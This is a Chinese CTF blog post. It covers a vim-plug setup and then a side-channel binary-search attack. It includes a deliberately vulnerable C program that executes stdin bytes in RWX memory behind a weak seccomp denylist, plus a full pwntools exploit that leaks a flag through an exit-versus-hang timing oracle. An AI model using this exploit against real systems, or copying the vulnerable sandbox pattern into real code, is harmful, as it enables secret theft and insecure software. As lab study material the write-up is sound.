侧信道爆破二分法

前言

在经过一段时间的休息后,总算有时间开始搞ctf了,把以前没有完成的任务完成一下,并记录。

  • vim优化方案
  • 侧信道二分法爆破

Vim优化方案

在复现网上相应的题目时,由于没有原本的文件,我按照对应思路自己写了一个文件,顺便优化了一下vim。

用的是vim-plug加各种小插件的方案

  • gruvbox
  • nerdtree
  • vim-airline

首先安装vim-plug

地址在这里:https://github.com/junegunn/vim-plug

curl -fLo ~/.vim/autoload/plug.vim --create-dirs \
https://raw.githubusercontent.com/junegunn/vim-plug/master/plug.vim

image-20230130183128286

发现需要科学上网,但是我的虚拟机不知道为什么无法科学上网,可能是配置的问题,有其他解决办法我就没有深究。

于是使用第二种办法

git clone https://gitee.com/S_rui/vim-plug.git
cp ./vim-plug/plug.vim ~/.vim/autoload/
rm -rf vim-plug

image-20230130183335598

亲测有用

然后配置对应文件即可

image-20230130183434369

image-20230130183447416

上面是因为我的计算机无法科学上网,于是我换成了gitee来拉取的,需要去修改.vim里面的配置文件,这个比较简单,就不占用篇幅了。

下面是原本视频里面的配置文件,可以根据需要选取

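" Vim Plugin
call plug#begin('~/.vim/plugged')
Plug 'morhetz/gruvbox'
Plug 'preservim/nerdtree'
Plug 'vim-airline/vim-airline'
call plug#end()

" Leader-key shortcuts: quit, write, toggle the file tree, locate the
" current file in the tree.
let mapleader = ";"
nnoremap <Leader>q :q<CR>
nnoremap <Leader>w :w<CR>
nnoremap <Leader>g :NERDTreeToggle<CR>
nnoremap <Leader>f :NERDTreeFind<CR>

" Share both the selection register ("*, 'unnamed') and the clipboard
" register ("+, 'unnamedplus') with the system clipboard. The original
" set the option twice; the second `set` replaced the first, so only
" 'unnamed' was actually in effect.
set clipboard=unnamed,unnamedplus
colorscheme gruvbox
set nu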

最后直接PlugInstall即可

image-20230130183951305

image-20230130184001853

然后就下载成功啦

视频在这,【2分钟配置让Vim好用10倍】 https://www.bilibili.com/video/BV17L411c7Eu/?share_source=copy_web&vd_source=41faae18c069e4173b0e6bb69470bcba

侧信道二分法

该方法学习于这篇文章

https://blog.csdn.net/woodwhale/article/details/120801223

根据该文章我实现了一个简单的程序来进行爆破

image-20230130184545777

#include <stdio.h>
#include <unistd.h>
#include <sys/mman.h>
#include <seccomp.h>
#include <linux/seccomp.h>
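int main()
{
    /*
     * Sandbox: default ALLOW with only execve and write killed. This is a
     * denylist, so every other syscall (open, read, mmap, exit, ...) stays
     * available to whatever code runs below -- which is exactly what the
     * side-channel in this write-up relies on. Outside a deliberately
     * vulnerable challenge, a default-KILL filter with an explicit allowlist
     * is the stronger shape. seccomp_load() is now checked so the process
     * fails closed instead of running unsandboxed when the filter cannot be
     * installed.
     */
    scmp_filter_ctx ctx;
    ctx = seccomp_init(SCMP_ACT_ALLOW);
    seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execve), 0);
    seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(write), 0);
    if (seccomp_load(ctx) < 0) {
        seccomp_release(ctx);
        return 1;
    }
    seccomp_release(ctx);

    /*
     * One page of anonymous RWX memory. The original passed the raw values
     * 7 (= PROT_READ|PROT_WRITE|PROT_EXEC) and 34 (= MAP_PRIVATE|MAP_ANONYMOUS)
     * and stored the result in an int, which truncates the address on 64-bit
     * builds; keep it as a pointer. fd is -1 as the mmap(2) man page asks for
     * anonymous mappings (Linux ignores it either way).
     */
    int page = getpagesize();
    void *entry = mmap((void *)0x1000, page, PROT_READ | PROT_WRITE | PROT_EXEC,
                       MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (entry == MAP_FAILED)
        return 1;

    /*
     * Read up to 0x18 bytes from stdin into the page and jump to it. A short
     * or failed read used to fall through and execute the zero-filled page;
     * bail out instead. Executing caller-supplied bytes is the challenge's
     * intended vulnerability and is left as is.
     */
    ssize_t n = read(0, entry, 0x18);
    if (n <= 0)
        return 1;
    static void (*APPEntry)(void);
    APPEntry = (void (*)(void))entry;
    (*APPEntry)();

    return 1;
}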

最后按照文章来复现即可。由于原理比较简单,这里只做个记录,不再详解,这位师傅的博客里面都有。

下面贴上该程序的exp

#!/usr/bin/env python3
# A script for pwn exp
from pwn import *
import os
import sys

# Target and tube settings. LOCAL / LIBC are the run-mode switches read by
# the main block; the ELF is parsed once here so context.arch follows it.
context.update(os='linux', terminal=['tmux', 'splitw', '-h'])
LOCAL = 1
LIBC = 0
elf_path = './vul'
libc_path = './libc.so.6'
code = ELF(elf_path)
context.arch = code.arch


# Thin wrappers over the global tube ``io`` (bound later by the main block
# or re-bound by pwn()). Written as functions rather than lambdas so that
# tracebacks carry a name (PEP 8, E731); behaviour is unchanged.
def r(x):
    return io.recv(x)


def ra():
    return io.recvall()


def rl():
    return io.recvline(keepends=True)


def ru(x):
    return io.recvuntil(x, drop=True)


def s(x):
    return io.send(x)


def sl(x):
    return io.sendline(x)


def sa(x, y):
    return io.sendafter(x, y)


def sla(x, y):
    return io.sendlineafter(x, y)


def ia():
    return io.interactive()


def c():
    return io.close()


def li(x):
    # orange highlight for progress messages
    return log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')


def info(data):
    # cyan highlight for data dumps
    return log.info('\033[36m' + data + '\033[0m')


def clear():
    return os.system('clear')


if LOCAL == 1:
    # context.log_level = 'debug'
    li("debug.......")
else:
    # Remote mode only: quiet the log and take host:port from argv[1].
    context.log_level = 'critical'
    target = sys.argv[1].split(':')
    server_ip = target[0]
    server_port = int(target[1])

# --------------------------func-----------------------------
def db():
    """Attach gdb to the live process and pause; no-op unless LOCAL."""
    if not LOCAL:
        return
    gdb.attach(io)
    pause()

def cat_flag():
    """Read one ``flag{...}`` line from an already-obtained shell, then exit.

    Not called anywhere in this script (template leftover). Note that the
    assembled ``flag`` is never logged before ``exit(0)``.
    """
    flag_header = b'flag{'
    sleep(1)
    sl('cat flag')
    ru(flag_header)
    body = ru('}')
    flag = b''.join([flag_header, body, b'}'])
    exit(0)


# --------------------------exploit--------------------------
def exploit():
    """Entry point of the attack stage: log a marker, then run pwn()."""
    li('exploit...')
    pwn()
def setread():
    """Send the first stage: a bare ``read`` syscall into the executable page.

    The target (C listing above) reads only 0x18 bytes into its RWX page and
    jumps to them, so this stage asks for a larger read
    (read(0, 0x10018, 0x250)) to make room for the second stage sent by pwn().
    NOTE(review): the 0x10018 destination is hard-coded; it presumably matches
    where the target's mmap actually lands on the author's system -- confirm
    against the real mapping, since the hint 0x1000 is not MAP_FIXED.
    """
    global io  # only read here; the declaration is harmless but unnecessary
    # Register roles for the syscall: rdi=fd, rsi=buf, rdx=count; rax=0 is read.
    # read(0,&0x10018,0x250)
    shellcode = '''
push 0x250
pop rdx
xor rsi,rsi
mov rsi,0x10018
xor rdi,rdi
xor rax,rax
syscall
'''
    shellcode = asm(shellcode)
    s(shellcode)
    sleep(0.3)  # give the target time to execute the stage before the next send
def pwn():
    """Recover the flag one byte at a time with a timing (binary-search) oracle.

    Each probe opens and reads ``flag`` in the target, then compares byte
    ``i`` with ``mid``: a greater byte jumps into an infinite loop (the recv
    below times out), otherwise the process exits via syscall 0x3c (recv
    hits EOF). Because every probe either hangs or exits the target, the
    process is closed and restarted after each one. Defensive note: the
    target's seccomp filter only forbids execve/write, which is why
    open/read/exit remain usable and the exit-vs-hang timing leaks data.
    """
    global io
    flag = "flag{"
    count = 1
    for i in range(len(flag), 0x20):  # flag assumed to be at most 0x20 bytes long
        left = 0
        right = 127  # search the 7-bit ASCII range [0, 127]
        while left < right:
            setread()
            mid = (left + right) >> 1
            orw_payload = shellcraft.open('flag')
            orw_payload += shellcraft.read(3, 'rsp', 0x100)  # assumes the flag lands on fd 3
            # byte i > mid  -> spin forever; otherwise exit(…) immediately
            orw_payload += f'''
mov dl,byte ptr [rsp+{i}]
mov cl,{mid}
cmp dl,cl
ja loop
mov al,0x3c
syscall
loop:
jmp loop
'''
            orw_payload = asm(orw_payload)
            sl(orw_payload)
            start_time = time.time()  # `time` is presumably re-exported by `from pwn import *`
            try:
                # NOTE(review): on timeout recv() presumably returns empty rather
                # than raising, so the elapsed-time check below is what detects
                # the "hang" branch; EOF (process exited) lands in the except.
                io.recv(timeout=0.25)
                if time.time() - start_time > 0.1:
                    left = mid + 1
            except:  # NOTE(review): bare except also swallows KeyboardInterrupt; `except EOFError` would be tighter
                right = mid
            io.close()
            clear()
            info(f"time-->{count}")
            info(flag)
            count += 1
            io = elf.process()  # fresh target for the next probe
        flag += chr(left)
        info(flag)
        if flag[-1] == "}":
            break

def finish():
    """Hand the tube over to the user interactively, then close it."""
    ia()
    c()


# --------------------------main-----------------------------
if __name__ == '__main__':
    # The ELF is needed in both modes (pwn() restarts it via elf.process()).
    elf = ELF(elf_path)
    if LOCAL:
        if LIBC:
            libc = ELF(libc_path)
            io = elf.process(env={"LD_PRELOAD": libc_path})
        else:
            io = elf.process()
    else:
        io = remote(server_ip, server_port)
        if LIBC:
            libc = ELF(libc_path)
    exploit()

    finish()